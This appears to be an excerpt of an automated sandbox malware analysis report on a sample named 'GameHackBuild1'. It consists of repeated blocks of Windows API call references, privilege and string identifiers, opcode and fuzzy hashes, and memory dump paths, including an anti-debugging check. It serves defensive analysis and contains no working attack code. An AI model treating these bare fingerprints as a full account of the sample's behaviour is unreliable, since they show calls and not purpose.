                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3935142422-3508440684
                                      • Opcode ID: bef014f852d816c2fc4f53c1c96ff3ad0990e84302f09b587087299d7b439ca2
                                      • Instruction ID: 021130c5038ce9c86d52122fb47ccea401014aa02a3aad16f5c173c44684cc1b
                                      • Opcode Fuzzy Hash: bef014f852d816c2fc4f53c1c96ff3ad0990e84302f09b587087299d7b439ca2
                                      • Instruction Fuzzy Hash: D4B1C171D04219ABDF21DFA4ED41BEE77B8BF05300F044569F949E7182D734AA49CBA1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID: CMT$h%u$hc%u
                                      • API String ID: 3004599000-3282847064
                                      • Opcode ID: 70fdb24d409216fa195508dd09240e951f437f84fbe93be68d26ff81fc722679
                                      • Instruction ID: ddbc1a239609da6cfae4bd7baed77e9eee298030ab50a015c4b5615d8832ed86
                                      • Opcode Fuzzy Hash: 70fdb24d409216fa195508dd09240e951f437f84fbe93be68d26ff81fc722679
                                      • Instruction Fuzzy Hash: 1632B6726103889FDF14DF74D995AEA37A9AF54300F04457EFD8A8B2C2DB71A948CB60
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 79f545f786a2b9c6cd2de2086d2af4b451510f551c832ad566016aec0ef8493f
                                      • Instruction ID: a79e11e2c4505f81f21e8b6f83d53e002f23b339fad76ee5ac9c835bfa0b08d4
                                      • Opcode Fuzzy Hash: 79f545f786a2b9c6cd2de2086d2af4b451510f551c832ad566016aec0ef8493f
                                      • Instruction Fuzzy Hash: 66C22A72E086288FDB25CF28ED407EAB7B5EB44315F1545EAD84EE7241E774AE818F40
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A027F1
                                      • _strlen.LIBCMT ref: 00A02D7F
                                        • Part of subcall function 00A1137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A0B652,00000000,?,?,?,00010444), ref: 00A11396
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A02EE0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                      • String ID: CMT
                                      • API String ID: 1706572503-2756464174
                                      • Opcode ID: 4aa0b9a6c35419480fcaada050a230c11818a87ebb393b0997fe4b94f7f59fa9
                                      • Instruction ID: 54bb1eafe5b10b1f7d98611219f0baf0769747e2a2b40e087d4dc2e788c23fc2
                                      • Opcode Fuzzy Hash: 4aa0b9a6c35419480fcaada050a230c11818a87ebb393b0997fe4b94f7f59fa9
                                      • Instruction Fuzzy Hash: 6D62F2729003488FDF28DF24D9997EA3BE5AF58300F08457DEC9A8B2C2DB74A945CB50
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A28767
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A28771
                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00A2877E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 0ca2552ab4be3663e4093a1b57f24334c16494ed13e1e31b0bbf9128c2188d70
                                      • Instruction ID: 5c6217b58d63eb9f01dae8c54641a1e061082c2be237b656474488ed705902c3
                                      • Opcode Fuzzy Hash: 0ca2552ab4be3663e4093a1b57f24334c16494ed13e1e31b0bbf9128c2188d70
                                      • Instruction Fuzzy Hash: 4131B5759012289BCB21DF68DD89BDCB7B4AF08310F5041EAF81CA7251EB349B858F45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: e3eb1d62d10f5d83bf470271f33bdf5b18343ae13b5295c30edf486e4ad62a1a
                                      • Instruction ID: a210f76ba620c5a47a3f34c0f619524e29c803915f350fbffe9212ab46226156
                                      • Opcode Fuzzy Hash: e3eb1d62d10f5d83bf470271f33bdf5b18343ae13b5295c30edf486e4ad62a1a
                                      • Instruction Fuzzy Hash: AF31F272800229AFCB24DF7CED84EEBBBBEDB95314F1401A8F91997251E6309D85CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                      • Instruction ID: c6a95cc0716573e4489389be61f0bcf2aae14d0a421986f9b07940fc399df07b
                                      • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                      • Instruction Fuzzy Hash: A9020D71E002299FDF14CFADD9806ADBBF1EF48324F254269E919E7384D731AA41CB90
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A1A662
                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A3E600,?,?), ref: 00A1A6B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: 37e2f68f27495eea0a381c26df4c8da47cc5db0d8d78885f58828b4d099d3adc
                                      • Instruction ID: 9ed2794ecef700bc8cad74ba3b89f7cd7396d622517bcb3a6b728006e0527617
                                      • Opcode Fuzzy Hash: 37e2f68f27495eea0a381c26df4c8da47cc5db0d8d78885f58828b4d099d3adc
                                      • Instruction Fuzzy Hash: 09014836500308BADB10CFA5EC06FABB7BCEF19711F004922BA04A7190D3709A258BA5
                                      APIs
                                      • GetLastError.KERNEL32(00A1117C,?,00000200), ref: 00A06EC9
                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A06EEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 0c501c1487f3e4f707522488ccbd98956d28be552840f89e3bbae394206aac1a
                                      • Instruction ID: a45ae861117e9960026df64485e9e112f5065c3dbfe730aa4dd7842ac3e52086
                                      • Opcode Fuzzy Hash: 0c501c1487f3e4f707522488ccbd98956d28be552840f89e3bbae394206aac1a
                                      • Instruction Fuzzy Hash: 66D0C7363C8306BFEE114B74DC05F277B64675AB46F108514B357D90D0C57090359615
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A3118F,?,?,00000008,?,?,00A30E2F,00000000), ref: 00A313C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: df5964088eb6d4ddb69454c6af87072f58dc2da9331f954f9e3928abed8da65d
                                      • Instruction ID: 7da94d1bad9b0e5c1c0201ec28558e519662cbe29f34585c0c424ba4067e5a61
                                      • Opcode Fuzzy Hash: df5964088eb6d4ddb69454c6af87072f58dc2da9331f954f9e3928abed8da65d
                                      • Instruction Fuzzy Hash: 91B14B71610608DFD715CF28C48ABA57BE0FF45364F298668F899CF2A1C335E992CB40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: 0d57d218fe89d0166f28328cdcd9a1fa5b348b01b3fec8eb1893101a2ad161d8
                                      • Instruction ID: a52ca8b00261a6282c756e36b13ae38ecfa0c91779006251d1770a70ba8b8297
                                      • Opcode Fuzzy Hash: 0d57d218fe89d0166f28328cdcd9a1fa5b348b01b3fec8eb1893101a2ad161d8
                                      • Instruction Fuzzy Hash: 50F1C2B2A083418FD748CF29D880A1AFBE1BFCC208F15892EF598D7711E774E9558B56
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00A0AD1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: a5d7b1368dc48b816c22d52d2a14ef26af5eaed207f75243dba2fdc958859024
                                      • Instruction ID: 02ac16f748cf6e851b5bce0d1af3fed945adcef1cd2f0df8ba856d18de49182b
                                      • Opcode Fuzzy Hash: a5d7b1368dc48b816c22d52d2a14ef26af5eaed207f75243dba2fdc958859024
                                      • Instruction Fuzzy Hash: 4AF01DB8D0030C8BCB28CB58FD41AE973B5F79A711F2006A9EA1943794D371AD469E51
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00A1EAC5), ref: 00A1F068
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 7e8fbe2de17c028644fee8e04b1c867aa07a33ee38e0f361088e6e7f065f6701
                                      • Instruction ID: 2c093945822b112073918ebab3c9283ea1d536beaf4635d72f3d3430c793dfbc
                                      • Opcode Fuzzy Hash: 7e8fbe2de17c028644fee8e04b1c867aa07a33ee38e0f361088e6e7f065f6701
                                      • Instruction Fuzzy Hash:
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 3214212f9a0e1bf54ce27d62555baa839f6d0bb5842473792d00adbb2d84ba83
                                      • Instruction ID: 749f0436968f4787850221798bd9558f9a68f9f195af09279b2382c4f48c8165
                                      • Opcode Fuzzy Hash: 3214212f9a0e1bf54ce27d62555baa839f6d0bb5842473792d00adbb2d84ba83
                                      • Instruction Fuzzy Hash: B2A001B96092018B9B40CFB6AE096093EA9AA456917098269B50AC6160EA6885629F41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4e6f686245691e8deafc412275daf14c0b6778875d503061389a73a882d99f1
                                      • Instruction ID: 8cf9751ad535fcb21c2e07cef2ddb357e322ec9d2b552b290c21d75008592ed3
                                      • Opcode Fuzzy Hash: d4e6f686245691e8deafc412275daf14c0b6778875d503061389a73a882d99f1
                                      • Instruction Fuzzy Hash: 4862E971A04B859FCB29CF38C9906F9BBE1AF95304F04C56DD8AA8B346D634E985CB14
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9fb576b17390bb22184e2771d7f6d2ea9ddecd1b2d3aee5da0db1480283fe06e
                                      • Instruction ID: 38bd71ce711257f4672095c6176065800e37d6b32ae6feabd2fe7726a1d09e56
                                      • Opcode Fuzzy Hash: 9fb576b17390bb22184e2771d7f6d2ea9ddecd1b2d3aee5da0db1480283fe06e
                                      • Instruction Fuzzy Hash: 1262F27160878A9FC719CF28C9805F9BBF1BF55304F14966DE8A68B742D730E996CB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5440585dfd394d5fd8077a7b337b4bea55dec9cc4813816d2c704a90d235d1aa
                                      • Instruction ID: 3460e1cbdc3adec7ed6068c87d5e727f14885dca43d75624e8aa5628cd0f7557
                                      • Opcode Fuzzy Hash: 5440585dfd394d5fd8077a7b337b4bea55dec9cc4813816d2c704a90d235d1aa
                                      • Instruction Fuzzy Hash: 3D523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 812b6346aa954855af07ccd2866c345bc8f865446b94536792dd6c2bd229148c
                                      • Instruction ID: 57f27b4e328f1632f75e9a94e97038e0adfc72691ed87ec5a2463101b80d7f50
                                      • Opcode Fuzzy Hash: 812b6346aa954855af07ccd2866c345bc8f865446b94536792dd6c2bd229148c
                                      • Instruction Fuzzy Hash: 7412C1B17047068BC728CF28D990AB9B7E1FF58308F14892EE597C7A81D774A8E5CB45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d3c34bfb415cfe69d59e2ce7529c99a5d1c92ae7b03a41ef38f880d819f39a7
                                      • Instruction ID: 17f48df5a731e71ea427e358da3a7fd3ff2414057ed9551ce528ae5f6fb5296d
                                      • Opcode Fuzzy Hash: 1d3c34bfb415cfe69d59e2ce7529c99a5d1c92ae7b03a41ef38f880d819f39a7
                                      • Instruction Fuzzy Hash: CAF19B72A183198FC718CF29E58496EBBE1EFC9324F148B2EF49597291D730E905CB52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
